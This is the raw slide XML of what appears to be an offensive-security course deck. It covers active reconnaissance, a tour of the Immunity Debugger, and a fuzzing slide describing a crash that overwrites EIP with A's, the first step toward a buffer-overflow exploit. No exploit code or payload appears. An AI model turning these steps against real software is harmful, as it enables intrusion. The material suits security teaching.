            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Recon involves interacting with the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not just technical – dumpster diving, social engineering, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technical side can be automated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> understand what the automation is doing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon (and most offensive security) is trial and error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Painful in the moment, but keep trying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take good notes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful for prioritization now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helps remember lessons learned later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3490702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9F809-79E3-4A3F-BA77-EFC20A41B7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DC1737B-2160-455C-9F84-C9C302E01E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD65080-17CC-472C-93E7-D572647A1384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858537" y="957245"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF7E354-5140-4603-9A4A-BF83E9F2B801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822533" y="942975"/>
            <a:ext cx="10333148" cy="5001490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="90000"/>
            </a:scheme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3" name="Isosceles Triangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2753E6-CD17-4F70-8C89-F17219CCD5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1935558" y="2900084"/>
            <a:ext cx="3227448" cy="1527834"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 21249"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha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4" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED92DF5-FED9-4214-BE51-DD110AE964AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858537" y="4970529"/>
            <a:ext cx="31422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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Memory Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{778285F6-B7EA-45E1-B48A-A12D1453FC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313199" y="2050277"/>
            <a:ext cx="7526558" cy="3227448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3440142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9F809-79E3-4A3F-BA77-EFC20A41B7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DC1737B-2160-455C-9F84-C9C302E01E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF544E7-79F5-4B96-930C-6A685B871F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="996959" y="1081070"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B43932E-4228-4F70-ACEA-3F802DDF29C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960955" y="1066800"/>
            <a:ext cx="10333148" cy="5001490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="90000"/>
            </a:scheme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3" name="Isosceles Triangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD163FC-F69D-4061-9D9E-89E42C353E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6829773" y="2193820"/>
            <a:ext cx="3815838" cy="2898320"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 19450"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha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4" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6DB662-D382-4078-BABD-0E6875F45E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061855" y="5000363"/>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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7441F5DF-9CFB-43FD-B1DB-64B0BC1F8B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="54464" t="61863" r="13718"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="559153" y="1689315"/>
            <a:ext cx="6778095" cy="3892255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1875391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9F809-79E3-4A3F-BA77-EFC20A41B7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DC1737B-2160-455C-9F84-C9C302E01E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAA1F50-BE38-4672-BB76-563D9BD3AAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="994863" y="1081070"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251BB97A-E499-4BA8-9222-5CA851104EE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958859" y="1066800"/>
            <a:ext cx="10333148" cy="5001490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="90000"/>
            </a:scheme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7" name="Isosceles Triangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C4668B-8960-4F21-9EDB-40F5777A727F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1415190" y="1349481"/>
            <a:ext cx="8643030" cy="703698"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 86125"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha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8" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F8F086-C072-490A-83CA-3F1EBF2B3D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4055203" y="3490527"/>
            <a:ext cx="11977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onsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LOGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CBCBA3-BD0A-4AAA-976D-19D4E9433F3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="1576" r="64883" b="89188"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415190" y="2053178"/>
            <a:ext cx="8683573" cy="1094171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2DD754-C9B4-4E37-AA46-51C1E0CAECC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7486181" y="3432528"/>
            <a:ext cx="9444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onsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B44107-25D0-4F45-8C2C-4D494C4255EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4654085" y="2600263"/>
            <a:ext cx="769270" cy="890264"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B313163-1CFF-49AF-B33F-2B0B8547E089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6998031" y="2684190"/>
            <a:ext cx="960395" cy="748338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5754A442-1194-447B-B23C-80178D428410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1176851" y="4136858"/>
            <a:ext cx="950308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olas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Helpful Shortcuts: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olas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>F9 – Run (needed every time you load a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olas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>F2 – Toggle Breakpoint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olas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>F7 – Step 1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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ctrl+F2 – Reload most recent program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1651431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44C311-A81E-4D7E-B082-629B8360BA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5467BD28-3A84-4B6F-AC01-F5C204780D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Walkthrough Backup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1909216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CF6465-6B96-4E02-B350-29C8390FD8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="263352" y="1530052"/>
            <a:ext cx="6343650" cy="5067300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1FA6627-F741-42DA-B6C1-085724BE0B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7218920" y="1659824"/>
            <a:ext cx="4267200" cy="1738151"/>
            <a:chOff x="7216286" y="2276872"/>
            <a:chExt cx="4267200" cy="1738151"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB33FD5-1CEB-458F-AD74-07680B91F1E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect b="72957"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7216286" y="2276872"/>
              <a:ext cx="4267200" cy="1061263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B580C06-CE01-4010-B9A0-764B5BCD1723}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect t="87382"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7216286" y="3519866"/>
              <a:ext cx="4267200" cy="495157"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4F996F-EB63-4AE7-A07D-65651B8E4701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6841370" y="5324120"/>
            <a:ext cx="4339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Program crashed – EIP contains only A’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0286EAD-12E0-431C-9C63-325F67962635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7320136" y="3893251"/>
            <a:ext cx="3333750" cy="1304925"/>
            <a:chOff x="7216286" y="4329100"/>
            <a:chExt cx="3333750" cy="1304925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E072328F-C44E-40F4-B323-37AA08E62050}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7216286" y="4329100"/>
              <a:ext cx="3333750" cy="1304925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC35E61D-035A-4967-8517-B8744198E276}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7216286" y="5445224"/>
              <a:ext cx="931942" cy="1888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4" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60069488-DC61-466C-8A4A-36A486742766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147362" y="1066800"/>
            <a:ext cx="66223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Start with a </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>fuzzer</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and slowly modify the file through the exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416C5F9A-1E50-4850-888A-A5FBD0E41567}"/>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Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28963158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83E228-CDA2-4362-95F8-419B404FF8BB}"/>
              </a:ext>
            </a:extLst>
